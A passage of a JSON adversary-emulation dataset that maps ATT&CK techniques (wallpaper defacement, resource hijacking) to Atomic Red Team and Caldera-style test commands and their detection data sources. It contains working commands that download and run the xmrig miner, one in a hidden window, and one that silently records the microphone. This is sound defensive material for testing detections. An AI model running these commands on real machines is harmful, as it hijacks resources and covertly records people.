executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "started", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "stopped", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1491.001", + "command_list": [ + "$url = \"https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png\"\n$imgLocation = \"#{wallpaper_location}\"\n$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\\Control Panel\\Desktop\\' -Name WallPaper).WallPaper\n$orgWallpaper | Out-File -FilePath \"#{pointer_to_orginal_wallpaper}\"\n$updateWallpapercode = @' \nusing System.Runtime.InteropServices; \nnamespace Win32{\n\n public class Wallpaper{ \n [DllImport(\"user32.dll\", CharSet=CharSet.Auto)] \n static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; \n \n public static void SetWallpaper(string thePath){ \n SystemParametersInfo(20,0,thePath,3); \n }\n }\n} \n'@\n$wc = New-Object System.Net.WebClient \ntry{ \n $wc.DownloadFile($url, $imgLocation)\n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \ncatch [System.Net.WebException]{ \n Write-Host(\"Cannot download $url\") \n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \nfinally{ \n $wc.Dispose() \n}\n", + "$url = \"#{url_of_wallpaper}\"\n$imgLocation = \"#{wallpaper_location}\"\n$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\\Control Panel\\Desktop\\' -Name WallPaper).WallPaper\n$orgWallpaper | Out-File -FilePath \"$env:TEMP\\T1491.001-OrginalWallpaperLocation\"\n$updateWallpapercode = @' \nusing System.Runtime.InteropServices; \nnamespace Win32{\n\n public class Wallpaper{ \n [DllImport(\"user32.dll\", CharSet=CharSet.Auto)] \n static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; \n \n public static void SetWallpaper(string thePath){ \n SystemParametersInfo(20,0,thePath,3); \n }\n }\n} \n'@\n$wc = New-Object System.Net.WebClient \ntry{ \n $wc.DownloadFile($url, $imgLocation)\n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \ncatch [System.Net.WebException]{ \n Write-Host(\"Cannot download $url\") \n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \nfinally{ \n $wc.Dispose() \n}\n", + "$url = \"#{url_of_wallpaper}\"\n$imgLocation = \"$env:TEMP\\T1491.001-newWallpaper.png\"\n$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\\Control Panel\\Desktop\\' -Name WallPaper).WallPaper\n$orgWallpaper | Out-File -FilePath \"#{pointer_to_orginal_wallpaper}\"\n$updateWallpapercode = @' \nusing System.Runtime.InteropServices; \nnamespace Win32{\n\n public class Wallpaper{ \n [DllImport(\"user32.dll\", CharSet=CharSet.Auto)] \n static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; \n \n public static void SetWallpaper(string thePath){ \n SystemParametersInfo(20,0,thePath,3); \n }\n }\n} \n'@\n$wc = New-Object System.Net.WebClient \ntry{ \n $wc.DownloadFile($url, $imgLocation)\n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \ncatch [System.Net.WebException]{ \n Write-Host(\"Cannot download $url\") \n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \nfinally{ \n $wc.Dispose() \n}\n" + ], + "commands": [ + { + "command": "$url = \"https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png\"\n$imgLocation = \"#{wallpaper_location}\"\n$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\\Control Panel\\Desktop\\' -Name WallPaper).WallPaper\n$orgWallpaper | Out-File -FilePath \"#{pointer_to_orginal_wallpaper}\"\n$updateWallpapercode = @' \nusing System.Runtime.InteropServices; \nnamespace Win32{\n\n public class Wallpaper{ \n [DllImport(\"user32.dll\", CharSet=CharSet.Auto)] \n static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; \n \n public static void SetWallpaper(string thePath){ \n SystemParametersInfo(20,0,thePath,3); \n }\n }\n} \n'@\n$wc = New-Object System.Net.WebClient \ntry{ \n $wc.DownloadFile($url, $imgLocation)\n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \ncatch [System.Net.WebException]{ \n Write-Host(\"Cannot download $url\") \n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \nfinally{ \n $wc.Dispose() \n}\n", + "source": "atomics/T1491.001/T1491.001.yaml", + "name": "Atomic Red Team Test - Defacement: Internal Defacement" + }, + { + "command": "$url = \"#{url_of_wallpaper}\"\n$imgLocation = \"#{wallpaper_location}\"\n$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\\Control Panel\\Desktop\\' -Name WallPaper).WallPaper\n$orgWallpaper | Out-File -FilePath \"$env:TEMP\\T1491.001-OrginalWallpaperLocation\"\n$updateWallpapercode = @' \nusing System.Runtime.InteropServices; \nnamespace Win32{\n\n public class Wallpaper{ \n [DllImport(\"user32.dll\", CharSet=CharSet.Auto)] \n static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; \n \n public static void SetWallpaper(string thePath){ \n SystemParametersInfo(20,0,thePath,3); \n }\n }\n} \n'@\n$wc = New-Object System.Net.WebClient \ntry{ \n $wc.DownloadFile($url, $imgLocation)\n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \ncatch [System.Net.WebException]{ \n Write-Host(\"Cannot download $url\") \n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \nfinally{ \n $wc.Dispose() \n}\n", + "source": "atomics/T1491.001/T1491.001.yaml", + "name": "Atomic Red Team Test - Defacement: Internal Defacement" + }, + { + "command": "$url = \"#{url_of_wallpaper}\"\n$imgLocation = \"$env:TEMP\\T1491.001-newWallpaper.png\"\n$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\\Control Panel\\Desktop\\' -Name WallPaper).WallPaper\n$orgWallpaper | Out-File -FilePath \"#{pointer_to_orginal_wallpaper}\"\n$updateWallpapercode = @' \nusing System.Runtime.InteropServices; \nnamespace Win32{\n\n public class Wallpaper{ \n [DllImport(\"user32.dll\", CharSet=CharSet.Auto)] \n static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; \n \n public static void SetWallpaper(string thePath){ \n SystemParametersInfo(20,0,thePath,3); \n }\n }\n} \n'@\n$wc = New-Object System.Net.WebClient \ntry{ \n $wc.DownloadFile($url, $imgLocation)\n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \ncatch [System.Net.WebException]{ \n Write-Host(\"Cannot download $url\") \n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \nfinally{ \n $wc.Dispose() \n}\n", + "source": "atomics/T1491.001/T1491.001.yaml", + "name": "Atomic Red Team Test - Defacement: Internal Defacement" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1491.001", + "display_name": "Defacement: Internal Defacement", + "atomic_tests": [ + { + "name": "Replace Desktop Wallpaper", + "auto_generated_guid": "30558d53-9d76-41c4-9267-a7bd5184bed3", + "description": "Downloads an image from a URL and sets it as the desktop wallpaper.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "url_of_wallpaper": { + "description": "URL pointing to the image file you wish to set as wallpaper", + "type": "Url", + "default": "https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png" + }, + "pointer_to_orginal_wallpaper": { + "description": "Full path to where a file containing the original wallpaper location will be saved", + "type": "String", + "default": "$env:TEMP\\T1491.001-OrginalWallpaperLocation" + }, + "wallpaper_location": { + "description": "Full path to where the downloaded wallpaper image will be saved", + "type": "String", + "default": "$env:TEMP\\T1491.001-newWallpaper.png" + } + }, + "executor": { + "command": "$url = \"#{url_of_wallpaper}\"\n$imgLocation = \"#{wallpaper_location}\"\n$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\\Control Panel\\Desktop\\' -Name WallPaper).WallPaper\n$orgWallpaper | Out-File -FilePath \"#{pointer_to_orginal_wallpaper}\"\n$updateWallpapercode = @' \nusing System.Runtime.InteropServices; \nnamespace Win32{\n\n public class Wallpaper{ \n [DllImport(\"user32.dll\", CharSet=CharSet.Auto)] \n static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; \n \n public static void SetWallpaper(string thePath){ \n SystemParametersInfo(20,0,thePath,3); \n }\n }\n} \n'@\n$wc = New-Object System.Net.WebClient \ntry{ \n $wc.DownloadFile($url, $imgLocation)\n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \ncatch [System.Net.WebException]{ \n Write-Host(\"Cannot download $url\") \n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \nfinally{ \n $wc.Dispose() \n}\n", + "cleanup_command": "$updateWallpapercode = @' \nusing System.Runtime.InteropServices; \nnamespace Win32{\n\n public class Wallpaper{ \n [DllImport(\"user32.dll\", CharSet=CharSet.Auto)] \n static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; \n \n public static void SetWallpaper(string thePath){ \n SystemParametersInfo(20,0,thePath,3); \n }\n }\n} \n'@\nif (Test-Path -Path #{pointer_to_orginal_wallpaper} -PathType Leaf) {\n $orgImg = Get-Content -Path \"#{pointer_to_orginal_wallpaper}\"\n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($orgImg)\n}\nRemove-Item \"#{pointer_to_orginal_wallpaper}\" -ErrorAction Ignore\nRemove-Item \"#{wallpaper_location}\" -ErrorAction Ignore\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1496", + "command_list": [ + "yes > /dev/null\n", + "wget https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-linux-x64.tar.gz;\ntar -xf xmrig-6.11.2-linux-x64.tar.gz;\ntimeout 60 ./xmrig-6.11.2/xmrig;\n[ $? -eq 124 ]\n", + "curl -OL https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-macos-x64.tar.gz;\ntar -xf xmrig-6.11.2-macos-x64.tar.gz;\nscreen -S miner -dm ./xmrig-6.11.2/xmrig;\nsleep 60s;\nkillall xmrig;\nscreen -S miner -X quit\n", + "Invoke-WebRequest -Uri https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-msvc-win64.zip -OutFile xmrig-6.11.2-msvc-win64.zip;\nExpand-Archive -LiteralPath xmrig-6.11.2-msvc-win64.zip -DestinationPath .\\;\nStart-Process \".\\xmrig-6.11.2\\xmrig.exe\" -WindowStyle Hidden;\nStart-Sleep -Seconds 60;\nStop-Process -Name \"xmrig\"\n", + "brew install sox >/dev/null 2>&1;\nsox -d recording.wav trim 0 15 >/dev/null 2>&1;\n" + ], + "commands": [ + { + "command": "yes > /dev/null\n", + "source": "atomics/T1496/T1496.yaml", + "name": "Atomic Red Team Test - Resource Hijacking" + }, + { + "command": "wget https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-linux-x64.tar.gz;\ntar -xf xmrig-6.11.2-linux-x64.tar.gz;\ntimeout 60 ./xmrig-6.11.2/xmrig;\n[ $? -eq 124 ]\n", + "source": "data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml", + "name": "Download and execute Monero miner (xmrig) for 1 minute" + }, + { + "command": "curl -OL https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-macos-x64.tar.gz;\ntar -xf xmrig-6.11.2-macos-x64.tar.gz;\nscreen -S miner -dm ./xmrig-6.11.2/xmrig;\nsleep 60s;\nkillall xmrig;\nscreen -S miner -X quit\n", + "source": "data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml", + "name": "Download and execute Monero miner (xmrig) for 1 minute" + }, + { + "command": "Invoke-WebRequest -Uri https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-msvc-win64.zip -OutFile xmrig-6.11.2-msvc-win64.zip;\nExpand-Archive -LiteralPath xmrig-6.11.2-msvc-win64.zip -DestinationPath .\\;\nStart-Process \".\\xmrig-6.11.2\\xmrig.exe\" -WindowStyle Hidden;\nStart-Sleep -Seconds 60;\nStop-Process -Name \"xmrig\"\n", + "source": "data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml", + "name": "Download and execute Monero miner (xmrig) for 1 minute" + }, + { + "command": "brew install sox >/dev/null 2>&1;\nsox -d recording.wav trim 0 15 >/dev/null 2>&1;\n", + "source": "data/abilities/impact/78524da1-f347-4fbb-9295-209f1f408330.yml", + "name": "Install sox and record microphone for n-seconds" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1496", + "display_name": "Resource Hijacking", + "atomic_tests": [ + { + "name": "macOS/Linux - Simulate CPU Load with Yes", + "auto_generated_guid": "904a5a0e-fb02-490d-9f8d-0e256eb37549", + "description": "This test simulates a high CPU load as you might observe during cryptojacking attacks.\nEnd the test by using CTRL/CMD+C to break.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "command": "yes > /dev/null\n", + "name": "bash" + } + } + ] + }, + { + "id": "46da2385-cf37-49cb-ba4b-a739c7a19de4", + "name": "Crypto (Monero) Mining", + "description": "Download and execute Monero miner (xmrig) for 1 minute", + "tactic": "impact", + "technique": { + "attack_id": "T1496", + "name": "Resource Hijacking" + }, + "platforms": { + "linux": { + "sh": { + "command": "wget https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-linux-x64.tar.gz;\ntar -xf xmrig-6.11.2-linux-x64.tar.gz;\ntimeout 60 ./xmrig-6.11.2/xmrig;\n[ $? -eq 124 ]\n", + "cleanup": "rm -rf ./xmrig*;\n", + "timeout": 120 + } + }, + "darwin": { + "sh": { + "command": "curl -OL https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-macos-x64.tar.gz;\ntar -xf xmrig-6.11.2-macos-x64.tar.gz;\nscreen -S miner -dm ./xmrig-6.11.2/xmrig;\nsleep 60s;\nkillall xmrig;\nscreen -S miner -X quit\n", + "cleanup": "rm -rf ./xmrig*;\n", + "timeout": 120 + } + }, + "windows": { + "psh": { + "command": "Invoke-WebRequest -Uri https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-msvc-win64.zip -OutFile xmrig-6.11.2-msvc-win64.zip;\nExpand-Archive -LiteralPath xmrig-6.11.2-msvc-win64.zip -DestinationPath .\\;\nStart-Process \".\\xmrig-6.11.2\\xmrig.exe\" -WindowStyle Hidden;\nStart-Sleep -Seconds 60;\nStop-Process -Name \"xmrig\"\n", + "cleanup": "rm ./xmrig* -r -fo;\n", + "timeout": 120 + } + } + } + }, + { + "id": "78524da1-f347-4fbb-9295-209f1f408330", + "name": "Record microphone", + "description": "Install sox and record microphone for n-seconds", + "tactic": "impact", + "technique": { + "attack_id": "T1496", + "name": "Resource Hijacking" + }, + "platforms": { + "darwin": { + "sh": { + "command": "brew install sox >/dev/null 2>&1;\nsox -d recording.wav trim 0 15 >/dev/null 2>&1;\n", + "timeout": 120 + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some 